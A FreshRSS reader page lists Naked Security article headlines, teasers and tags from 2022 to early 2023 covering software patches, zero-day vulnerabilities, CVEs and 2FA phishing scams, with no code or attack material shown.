Login
FreshRSS
Login
About FreshRSS
Main stream
Favourites (0)
Security
/r/netsec - Information Security News & Discussion
Dark Reading:
http://blog.trendmicro.com/feed
ICS-CERT Alert Feed
Infosec Island Latest Articles
InfoSec Resources
Krebs on Security
McAfee Blogs
Naked Security
News β Packet Storm
Paul's Security Weekly
SANS Internet Storm Center, InfoCON: green
Security β Cisco Blog
SecurityFocus News
The first stop for security news | Threatpost
The Hacker News
The Register - Security
Threatpost | The first stop for security news
Troy Hunt
Verisign Blog
WeLiveSecurity
WIRED
ZDNet | security RSS
Tools
Security Tool Files β Packet Storm
ToolsWatch.org β The Hackers Arsenal Tools Portal
Vulnerabilities
Advisory Files β Packet Storm
Exploit-DB Updates
Full Disclosure
SecurityFocus Vulnerabilities
There are new available articles, click to refresh the page.
Before yesterday
Naked Security
Naked Security
Twitter tells users: Pay up if you want to keep using insecure 2FA
February 20
th
2023 at 17:58Β
Twitter tells users: Pay up if you want to keep using insecure 2FA
By
Paul Ducklin
Ironically, Twitter Blue users will be allowed to keep using the very 2FA process that's not considered secure enough for everyone else.
Related tags
β
2-factor
Authentication
Twitter
2FA
SIM
sim
swap
February 20
th
2023 at 17:58
Naked Security
Apple fixes zero-day spyware implant bug β patch now!
February 14
th
2023 at 19:08Β
Apple fixes zero-day spyware implant bug β patch now!
By
Paul Ducklin
Everyone update now! Except for those who don't need to! Or who need to but will only get updates later on, though Apple isn't saying yet!
Related tags
β
Apple
Apple
Safari
Vulnerability
VE-2023-23529
Zero
Day
February 14
th
2023 at 19:08
Naked Security
Password-stealing βvulnerabilityβ reported in KeePass β bug or feature?
February 1
st
2023 at 19:58Β
Password-stealing βvulnerabilityβ reported in KeePass β bug or feature?
By
Paul Ducklin
Is it a vulnerability if someone with control over your account can mess with files that your account is allowed to access anyway?
Related tags
β
Cryptography
Data
loss
Vulnerability
CVE-2023-24055
data
leakage
KeePass
trigger
February 1
st
2023 at 19:58
Naked Security
Serious Security: The Samba logon bug caused by outdated crypto
January 30
th
2023 at 19:59Β
Serious Security: The Samba logon bug caused by outdated crypto
By
Paul Ducklin
Enjoy our Serious Security deep dive into this real-world example of why cryptographic agility is important!
Related tags
β
Cryptography
Vulnerability
CIFS
collision
CVE-2022-38023
mac
MD5
message
digest
Samba
SMB
January 30
th
2023 at 19:59
Naked Security
Apple patches are out β old iPhones get an old zero-day fix at last!
January 24
th
2023 at 01:24Β
Apple patches are out β old iPhones get an old zero-day fix at last!
By
Paul Ducklin
Don't delay, especially if you're still running an iOS 12 device... please do it today!
Related tags
β
Apple
Vulnerability
CVE-2022-42856
Exploit
ios
ios
12
iPadOS
macOS
Ventura
Zero
Day
January 24
th
2023 at 01:24
Naked Security
Microsoft dishes the dirt on Appleβs βAchilles heelβ shortly after fixing similar Windows bug
December 20
th
2022 at 17:59Β
Microsoft dishes the dirt on Appleβs βAchilles heelβ shortly after fixing similar Windows bug
By
Paul Ducklin
It happens to the best of us: Microsoft highlights a security bypass bug on Macs that is curiously similar to a recent Windows 0-day.
Related tags
β
Apple
Microsoft
Vulnerability
Achilles
CVE-2022-42821
Gatekeeper
macOS
MOTW
vulnerability
December 20
th
2022 at 17:59
Naked Security
Apple patches everything, finally reveals mystery of iOS 16.1.2
December 14
th
2022 at 02:11Β
Apple patches everything, finally reveals mystery of iOS 16.1.2
By
Paul Ducklin
There's an update for everything this time, not just for iOS.
Related tags
β
Apple
Vulnerability
CVE-2022-42856
December 14
th
2022 at 02:11
Naked Security
Pwn2Own Toronto: 54 hacks, 63 new bugs, $1 million in bounties
December 12
th
2022 at 19:58Β
Pwn2Own Toronto: 54 hacks, 63 new bugs, $1 million in bounties
By
Paul Ducklin
That's a mean average of $15,710 per bug... and 63 fewer bugs out there for crooks and rogues to find.
Related tags
β
Security
events
Vulnerability
Exploit
hacking
Pwn2Own
vulnerability
December 12
th
2022 at 19:58
Naked Security
SIM swapper sent to prison for 2FA cryptocurrency heist of over $20m
December 6
th
2022 at 17:56Β
SIM swapper sent to prison for 2FA cryptocurrency heist of over $20m
By
Naked Security writer
Guilty party got 18 months, also has to pay back $20m he probably hasn't got, which could land him in more hot water.
Related tags
β
Cryptocurrency
Law
&
order
2FA
Cybercrime
password
sim
swap
December 6
th
2022 at 17:56
Naked Security
Number Nine! Chrome fixes another 2022 zero-day, Edge patched too
December 5
th
2022 at 20:58Β
Number Nine! Chrome fixes another 2022 zero-day, Edge patched too
By
Paul Ducklin
Ninth more unto the breach, dear friends, ninth more.
Related tags
β
Google
Google
Chrome
Microsoft
Vulnerability
"Edge"
chrome
Chromium
CVE-2022-4262
Zero
Day
December 5
th
2022 at 20:58
Naked Security
The CHRISTMA EXEC network worm β 35 years and counting!
December 1
st
2022 at 20:35Β
The CHRISTMA EXEC network worm β 35 years and counting!
By
Paul Ducklin
"Uh-oh, this viruses-and-worms scene could turn out quite troublesome." If only we'd been wrong...
xmas-1200-35-wide
Related tags
β
Malware
3270
Christma
CMS
IBM
Virus
worm
December 1
st
2022 at 20:35
Naked Security
Serious Security: MD5 considered harmful β to the tune of $600,000
November 30
th
2022 at 17:58Β
Serious Security: MD5 considered harmful β to the tune of $600,000
By
Paul Ducklin
It's not just the hashing, by the way. It's the salting and the stretching, too!
Related tags
β
Cryptography
Law
&
order
CNIL
EDF
hashing
MD5
PBKDF2
November 30
th
2022 at 17:58
Naked Security
How to hack an unpatched Exchange server with rogue PowerShell code
November 22
nd
2022 at 19:54Β
How to hack an unpatched Exchange server with rogue PowerShell code
By
Paul Ducklin
Review your servers, your patches and your authentication policies - there's a proof-of-concept out
Related tags
β
Microsoft
Uncategorized
Vulnerability
day
:ProxyNotShell
CVE-2022-41040
CVE-2022-41082
Zero
Day
November 22
nd
2022 at 19:54
Naked Security
Log4Shell-like code execution hole in popular Backstage dev tool
November 15
th
2022 at 17:49Β
Log4Shell-like code execution hole in popular Backstage dev tool
By
Paul Ducklin
Good old "string templating", also known as "string interpolation", in the spotlight again...
bs-1200
Related tags
β
Vulnerability
Backstage
CVE-2022-36067
November 15
th
2022 at 17:49
Naked Security
Dangerous SIM-swap lockscreen bypass β update Android now!
November 11
th
2022 at 19:59Β
Dangerous SIM-swap lockscreen bypass β update Android now!
By
Paul Ducklin
A bit like leaving the front door keys under the doormat...
Related tags
β
Android
Google
CVE-2022-20465
hacking
lockscreen
pypass
SIM
November 11
th
2022 at 19:59
Naked Security
Emergency code execution patch from Apple β but not an 0-day
November 10
th
2022 at 01:49Β
Emergency code execution patch from Apple β but not an 0-day
By
Paul Ducklin
Not a zero-day, but important enough for a quick-fire patch to one system library...
Related tags
β
Apple
iOS
OS
X
Vulnerability
CVE-2022-40303
CVE-2022-40304
November 10
th
2022 at 01:49
Naked Security
Twitter Blue Badge email scams β Donβt fall for them!
November 4
th
2022 at 17:59Β
Twitter Blue Badge email scams β Donβt fall for them!
By
Naked Security writer
That was the week that was...
Related tags
β
2-factor
Authentication
Phishing
Privacy
Spam
blue
badge
phishing
Twitter
verified
November 4
th
2022 at 17:59
Naked Security
The OpenSSL security update story β how can you tell what needs fixing?
November 3
rd
2022 at 00:44Β
The OpenSSL security update story β how can you tell what needs fixing?
By
Paul Ducklin
How to Hack! Finding OpenSSL library files and accurately identifying their version numbers...
ossl-code-1200
Related tags
β
Cryptography
Vulnerability
CVE-2022-3602
CVE-2022-378
openssl
November 3
rd
2022 at 00:44
Naked Security
OpenSSL patches are outΒ β CRITICAL bug downgraded to HIGH, but patch anyway!
November 1
st
2022 at 17:24Β
OpenSSL patches are outΒ β CRITICAL bug downgraded to HIGH, but patch anyway!
By
Paul Ducklin
That bated-breath OpenSSL update is out! It's no longer rated CRITICAL, but we advise you to patch ASAP anyway. Here's why...
Related tags
β
Cryptography
Vulnerability
CVE-2022-3602
CVE-2022-3786
openssl
vulneravility
November 1
st
2022 at 17:24
Naked Security
SHA-3 code execution bug patched in PHP β check your version!
November 1
st
2022 at 14:09Β
SHA-3 code execution bug patched in PHP β check your version!
By
Paul Ducklin
As everyone waits for news of a bug in OpenSSL, here's a reminder that other cryptographic code in your life may also need patching!
Related tags
β
Cryptography
Vulnerability
cryptograhpy
CVE-2022-37454
PHP
sha-3
November 1
st
2022 at 14:09
Naked Security
Chrome issues urgent zero-day fix β update now!
October 29
th
2022 at 15:08Β
Chrome issues urgent zero-day fix β update now!
By
Paul Ducklin
We've said it before/And we'll say it again/It's not *if* you should patch/It's a matter of *when*. (Hint: now!)
Related tags
β
Google
Google
Chrome
Vulnerability
"Edge"
day
chrome
Chromium
CVE-2022-3723
Exploit
Zero
Day
October 29
th
2022 at 15:08
Naked Security
Updates to Appleβs zero-day update story β iPhone and iPad users read this!
October 28
th
2022 at 18:04Β
Updates to Appleβs zero-day update story β iPhone and iPad users read this!
By
Paul Ducklin
Turns out that Tuesday's zero-day for iOS 16 is Friday's zero-day for iOS 15...
Related tags
β
Apple
Vulnerability
CVE-2022-42827
iPad
iPhone
spyware
Zero
Day
October 28
th
2022 at 18:04
Naked Security
Apple megaupdate: Ventura out, iOS and iPad kernel zero-day β act now!
October 25
th
2022 at 18:03Β
Apple megaupdate: Ventura out, iOS and iPad kernel zero-day β act now!
By
Paul Ducklin
Ventura hits the market with 112 patches, Catalina's gone missing, and iPhones and iPads get a critical kernel-level zero-day patch...
Related tags
β
Apple
iOS
OS
X
Vulnerability
day
CVE-2022-42827
Exploit
ios
iPad
iPhone
mac
vulnerability
zer-day
October 25
th
2022 at 18:03
Naked Security
Zoom for Mac patches sneaky βspy-on-meβ bug β update now!
October 18
th
2022 at 18:01Β
Zoom for Mac patches sneaky βspy-on-meβ bug β update now!
By
Paul Ducklin
Hey! That back door isn't supposed to be there at all, let alone propped open...
Related tags
β
Uncategorized
CVE-2022-28762
snooping
spyware
vulnerabiloity
zoom
October 18
th
2022 at 18:01
Naked Security
Dangerous hole in Apache Commons Text β like Log4Shell all over again
October 18
th
2022 at 17:26Β
Dangerous hole in Apache Commons Text β like Log4Shell all over again
By
Paul Ducklin
Third time unlucky. Time to put your patching boots on again...
act-1200
Related tags
β
Vulnerability
Apache
Apache
Commons
Text
CVE-2022-42889
Log4j
Log4Shell
string
interpolation
October 18
th
2022 at 17:26
Naked Security
Mystery iPhone update patches against iOS 16 mail crash-attack
October 11
th
2022 at 00:28Β
Mystery iPhone update patches against iOS 16 mail crash-attack
By
Paul Ducklin
The problem with crashy messaging apps is that *other people* get to choose if and when to send you messages...
Related tags
β
Apple
iOS
Vulnerability
crash-of-death
CVE-2022-22658
ios
October 11
th
2022 at 00:28
Naked Security
S3 Ep102.5: βProxyNotShellβ Exchange bugs β an expert speaks [Audio + Text]
October 1
st
2022 at 14:05Β
S3 Ep102.5: βProxyNotShellβ Exchange bugs β an expert speaks [Audio + Text]
By
Paul Ducklin
Who's affected, what you can do while waiting for Microsoft's patches, and how to plan your threat hunting...
Related tags
β
Microsoft
Podcast
Vulnerability
:ProxyNotShell
chester
wisniewski
CVE-2022-41040
CVE-2022-41042
exchange
Zero
Day
October 1
st
2022 at 14:05
Naked Security
URGENT! Microsoft Exchange double zero-day β βlike ProxyShell, only differentβ
September 30
th
2022 at 18:25Β
URGENT! Microsoft Exchange double zero-day β βlike ProxyShell, only differentβ
By
Paul Ducklin
Double-play 0-day in Exchange - what you need to know, and what you can do
Related tags
β
Microsoft
Vulnerability
CVE-2022-41040
CVE-2022-41082
exchange
vulnerability
Zero
Day
September 30
th
2022 at 18:25
Naked Security
Uber and Rockstar β has a LAPSUS$ linchpin just been busted (again)?
September 24
th
2022 at 22:57Β
Uber and Rockstar β has a LAPSUS$ linchpin just been busted (again)?
By
Paul Ducklin
Is this the same suspect as before? Is he part of LAPSUS$? Is this the man who hacked Uber and Rockstar? And, if so, who else?
Related tags
β
Law
&
order
2FA
hacking
lapsus
Rockstar
Uber
September 24
th
2022 at 22:57
Naked Security
S3 Ep101: Uber and LastPass breaches β is 2FA all itβs cracked up to be? [Audio + Text]
September 22
nd
2022 at 18:42Β
S3 Ep101: Uber and LastPass breaches β is 2FA all itβs cracked up to be? [Audio + Text]
By
Paul Ducklin
Latest episode - listen now! Learn why adopting 2FA isn't a reason to relax your other security precautions...
Related tags
β
Data
loss
Podcast
2FA
data
breach
LastPass
MFA
Naked
Security
Podcast
Uber
September 22
nd
2022 at 18:42
Naked Security
Chrome and Edge fix zero-day security hole β update now!
September 5
th
2022 at 15:12Β
Chrome and Edge fix zero-day security hole β update now!
By
Paul Ducklin
This time, the crooks got there first - only 1 security hole patched, but it's a zero-day.
Related tags
β
Google
Google
Chrome
Vulnerability
chrome
CVE-2022-3075
Exploit
Patch
Zero
Day
September 5
th
2022 at 15:12
Naked Security
URGENT! Apple slips out zero-day update for older iPhones and iPads
August 31
st
2022 at 18:42Β
URGENT! Apple slips out zero-day update for older iPhones and iPads
By
Paul Ducklin
Patch as soon as you can - that recent WebKit zero-day affecting new iPhones and iPads is apparently being used against older models, too.
Related tags
β
Apple
iOS
CVE-2022-32893
ios
spyware
webkit
Zero
Day
August 31
st
2022 at 18:42
Naked Security
Laptop denial-of-service via music: the 1980s R&B song with a CVE!
August 22
nd
2022 at 16:03Β
Laptop denial-of-service via music: the 1980s R&B song with a CVE!
By
Paul Ducklin
We haven't validated this vuln ourselves... but the source of the story is impeccable. (Impeccably dressed, at least.)
Related tags
β
Vulnerability
chen
CVE-2022-38392
Janet
Jackson
music
Raymond
Chen
resonance
August 22
nd
2022 at 16:03
Naked Security
Apple patches double zero-day in browser and kernel β update now!
August 17
th
2022 at 23:33Β
Apple patches double zero-day in browser and kernel β update now!
By
Paul Ducklin
Double 0-day exploits - one in WebKit (to break in) and the other in the kernel (to take over). Patch now!
Related tags
β
Apple
iOS
Malware
OS
X
Vulnerability
CVE-2022-32893
CVE-2022-32894
ios
iPadOS
jailbreak
macOS
spyware
August 17
th
2022 at 23:33
Naked Security
Zoom for Mac patches critical bug β update now!
August 15
th
2022 at 18:26Β
Zoom for Mac patches critical bug β update now!
By
Paul Ducklin
There's many a slip 'twixt the cup and the lip. Or at least between the TOC and the TOU...
Related tags
β
OS
X
Vulnerability
CVE-2022-28756
macOS
Wardle
zoom
August 15
th
2022 at 18:26
Naked Security
APIC/EPIC! Intel chips leak secrets even the kernel shouldnβt seeβ¦
August 10
th
2022 at 16:59Β
APIC/EPIC! Intel chips leak secrets even the kernel shouldnβt seeβ¦
By
Paul Ducklin
If you've ever written code that left stuff lying around in memory when you didn't need it any more... we bet you've regretted it!
Related tags
β
Cryptography
Data
loss
Vulnerability
APIC
CVE-2022-21233
EPIC
SGX
ΓPIC
Leak
August 10
th
2022 at 16:59
Naked Security
GnuTLS patches memory mismanagement bug β update now!
August 1
st
2022 at 16:55Β
GnuTLS patches memory mismanagement bug β update now!
By
Paul Ducklin
GnuTLS may well be the most widespread cryptographic toolkit you've never heard of. Learn more...
Related tags
β
Cryptography
Vulnerability
CVE-2022-2509
double-free
gnutls
heartbleed
August 1
st
2022 at 16:55
Naked Security
Critical Samba bug could let anyone become Domain Admin β patch now!
July 27
th
2022 at 21:15Β
Critical Samba bug could let anyone become Domain Admin β patch now!
By
Paul Ducklin
It's a serious bug... but there's a fix for it, so you know exactly what to do!
Related tags
β
Vulnerability
CVE-2022-32744
password
reset
Samba
July 27
th
2022 at 21:15
Naked Security
Facebook 2FA scammers return β this time in just 21 minutes
July 13
th
2022 at 16:46Β
Facebook 2FA scammers return β this time in just 21 minutes
By
Paul Ducklin
Last time they arrived 28 minutes after lighting up their fake domain... this time it was just 21 minutes
Related tags
β
Facebook
Phishing
Privacy
2FA
Scam
July 13
th
2022 at 16:46
Naked Security
Apache βCommons Configurationβ patches Log4Shell-style bug β what you need to know
July 8
th
2022 at 00:59Β
Apache βCommons Configurationβ patches Log4Shell-style bug β what you need to know
By
Paul Ducklin
It's a bit like Log4J, but for configuration files, not for logging.
Related tags
β
Vulnerability
Apache
Commons
CVE-2022-33980
July 8
th
2022 at 00:59
Naked Security
S3 Ep90: Chrome 0-day again, True Cybercrime, and a 2FA bypass [Podcast + Transcript]
July 7
th
2022 at 18:46Β
S3 Ep90: Chrome 0-day again, True Cybercrime, and a 2FA bypass [Podcast + Transcript]
By
Paul Ducklin
Listen now! Or read if you prefer...
Related tags
β
Cryptocurrency
Google
Google
Chrome
Law
&
order
Podcast
Vulnerability
2FA
busts
cryptocurrency
Naked
Security
Podcast
OneCoin
July 7
th
2022 at 18:46
Naked Security
Google patches βin-the-wildβ Chrome zero-day β update now!
July 5
th
2022 at 15:55Β
Google patches βin-the-wildβ Chrome zero-day β update now!
By
Paul Ducklin
Running Chrome? Do the "Help-About-Update" dance move right now, just to be sure...
Related tags
β
Google
Google
Chrome
Vulnerability
day
chrome
CVE-2022-2294
vulnerability
zer-day
Zero
Day
July 5
th
2022 at 15:55
Naked Security
Facebook 2FA phish arrives just 28 minutes after scam domain created
July 1
st
2022 at 20:01Β
Facebook 2FA phish arrives just 28 minutes after scam domain created
By
Paul Ducklin
The crooks hit us up with this phishing email less than half an hour after they activated their new scam domain.
Related tags
β
Data
loss
Facebook
Phishing
Privacy
2FA
phishing
Scam
July 1
st
2022 at 20:01
Naked Security
S3 Ep87: Follina, AirTags, ID theft and the Law of Big Numbers [Podcast]
June 16
th
2022 at 16:52Β
S3 Ep87: Follina, AirTags, ID theft and the Law of Big Numbers [Podcast]
By
Paul Ducklin
Lastest epsiode - listen now!
Related tags
β
Apple
Microsoft
Phishing
Podcast
Vulnerability
CVE-2022-30190
Exploit
Follina
phishing
SMS
vishing
vulnerability
June 16
th
2022 at 16:52
Naked Security
Follina gets fixed β but itβs not listed in the Patch Tuesday patches!
June 15
th
2022 at 01:20Β
Follina gets fixed β but itβs not listed in the Patch Tuesday patches!
By
Paul Ducklin
We tried it out to make sure, so you don't have to.
Related tags
β
Microsoft
Vulnerability
CVE-2022-30190
Follina
Patch
Tuesday
June 15
th
2022 at 01:20
Naked Security
Youβre invited! Join us for a live walkthrough of the βFollinaβ storyβ¦
June 13
th
2022 at 16:28Β
Youβre invited! Join us for a live walkthrough of the βFollinaβ storyβ¦
By
Paul Ducklin
Live demo, plain English, no sales pitch, just a chance to watch an attack dissected in safety. Join us if you can!
Related tags
β
Malware
Security
leadership
Vulnerability
CVE-2022-30190
Follina
webinar
June 13
th
2022 at 16:28
Naked Security
Atlassian announces 0-day hole in Confluence Server β update now!
June 3
rd
2022 at 18:59Β
Atlassian announces 0-day hole in Confluence Server β update now!
By
Paul Ducklin
Zero-day announced - here's what you need to know
Related tags
β
Vulnerability
atlassian
CVE-2022-26134
Zero
Day
June 3
rd
2022 at 18:59
Naked Security
S3 Ep85: Now THATβS what I call a Microsoft Office exploit! [Podcast]
June 2
nd
2022 at 18:37Β
S3 Ep85: Now THATβS what I call a Microsoft Office exploit! [Podcast]
By
Paul Ducklin
Latest episode - listen now!
Related tags
β
Phishing
Podcast
Privacy
Vulnerability
CVE-2022-30190
Follina
Naked
Security
Podcast
smishing
SMS
webcam
June 2
nd
2022 at 18:37
Naked Security
Mysterious βFollinaβ zero-day hole in Office β hereβs what to do!
May 30
th
2022 at 23:01Β
Mysterious βFollinaβ zero-day hole in Office β hereβs what to do!
By
Paul Ducklin
News has emerged of a "feature" in Office that has been abused as a zero-day bug to run evil code. Turning off macros doesn't help!
Related tags
β
Microsoft
Security
threats
Vulnerability
CVE-2022-30190
Follina
ms-msdt
MSDT
Office
Zero
Day
May 30
th
2022 at 23:01
Naked Security
Mozilla patches Wednesdayβs Pwn2Own double-exploitβ¦ on Friday!
May 20
th
2022 at 23:47Β
Mozilla patches Wednesdayβs Pwn2Own double-exploitβ¦ on Friday!
By
Paul Ducklin
That was quick! 48 hours from exploit report to published patch.
Related tags
β
Firefox
Mozilla
Vulnerability
CVE-2022-1529
CVE-2022-1802
Manfred
Paul
Pwn2Own
May 20
th
2022 at 23:47
Naked Security
US Government says: Patch VMware right now, or get off our network
May 20
th
2022 at 14:03Β
US Government says: Patch VMware right now, or get off our network
By
Paul Ducklin
Find and patch. Right now. If you can't patch, get it off the network. Right now! Oh, and show us what you did to comply.
Related tags
β
Vulnerability
CVE-2022-22972
CVE-2022-22973
Federal
Government
MTR
VMware
May 20
th
2022 at 14:03
Naked Security
Pwn2Own hacking schedule released β Windows and Linux are top targets
May 18
th
2022 at 13:04Β
Pwn2Own hacking schedule released β Windows and Linux are top targets
By
Paul Ducklin
What's better? Disclose early, patch fast? Or dig deep, disclose in full, patch more slowly?
Related tags
β
Vulnerability
hacking
Pwn2Own
research
secops
May 18
th
2022 at 13:04
Naked Security
Firefox out-of-band update to 100.0.1 β just in time for Pwn2Own?
May 15
th
2022 at 21:53Β
Firefox out-of-band update to 100.0.1 β just in time for Pwn2Own?
By
Paul Ducklin
A new point-release of Firefox. Not unusual, but the timing of this one is interesting, with Pwn2Own coming up in a few days.
Related tags
β
Firefox
Mozilla
Pwn2Own
Sandbox
May 15
th
2022 at 21:53
Naked Security
RubyGems supply chain rip-and-replace bug fixed β check your logs!
May 9
th
2022 at 15:41Β
RubyGems supply chain rip-and-replace bug fixed β check your logs!
By
Paul Ducklin
Imagine if you could assume the identity of, say, Franklin Delano Roosevelt simply by showing up and calling yourself "Frank".
ruby-1200
Related tags
β
Vulnerability
CVE-2022-29176
ruby
RubyGems
suppy
chain
vulnerability
May 9
th
2022 at 15:41
Naked Security
Critical cryptographic Java security blunder patched β update now!
April 20
th
2022 at 16:43Β
Critical cryptographic Java security blunder patched β update now!
By
Paul Ducklin
Either know the private key and use it scrupulously in your digital signature calculation.... or just send a bunch of zeros instead.
Related tags
β
Cryptography
Java
Oracle
Vulnerability
CVE-2022-21449
digital
signature
vulnerability
April 20
th
2022 at 16:43
Naked Security
Yet another Chrome zero-day emergency update β patch now!
April 16
th
2022 at 00:33Β
Yet another Chrome zero-day emergency update β patch now!
By
Paul Ducklin
The third emergency Chrome 0-day in three months - the first one was exploited by North Korea, so you might as well get this one ASAP.
Related tags
β
Google
Google
Chrome
Microsoft
Edge
Vulnerability
"Edge"
browser
chrome
CVE-2022-1364
type
confusion
vulnerability
April 16
th
2022 at 00:33
Naked Security
Two different βVMware Springβ bugs at large β we cut through the confusion
March 31
st
2022 at 16:59Β
Two different βVMware Springβ bugs at large β we cut through the confusion
By
Paul Ducklin
Whoever came up with the name "Spring4Shell" didn't help at all... we cut through the Spring Bug confusion
Related tags
β
CVE-2022-22963
CVE-2022-22965
Spring
Spring
Cloud
Spring
Framework
Spring4Shell
VMWare
Spring
March 31
st
2022 at 16:59
Naked Security
βVMware Spring Cloud Functionβ Java bug gives instant remote code execution β update now!
March 30
th
2022 at 20:38Β
βVMware Spring Cloud Functionβ Java bug gives instant remote code execution β update now!
By
Paul Ducklin
Easy unauthenticated remote code execution - PoC code already out
Related tags
β
Uncategorized
CVE-2022-22963
Java
Log4She;;
SPEL
Spring
Spring
Cloud
Spring
Expression
Resource
March 30
th
2022 at 20:38
Naked Security
Zlib data compressor fixes 17-year-old security bug β patch, errrm, now
March 29
th
2022 at 16:37Β
Zlib data compressor fixes 17-year-old security bug β patch, errrm, now
By
Paul Ducklin
This code is venerable! Surely all the bugs must be out by now?
Related tags
β
Vulnerability
CVE-2018-25032
DEFLATE
ormandy
vulnerability
Zlib
March 29
th
2022 at 16:37
Naked Security
Google Chrome patches mysterious new zero-day bug β update now
March 28
th
2022 at 14:18Β
Google Chrome patches mysterious new zero-day bug β update now
By
Paul Ducklin
CVE-2022-1096 - another mystery in-the-wild 0-day in Chrome... check your version now!
Related tags
β
Google
Google
Chrome
chrome
Chromium
CVE-2022-1096
Exploit
Zero
Day
March 28
th
2022 at 14:18
Load more articles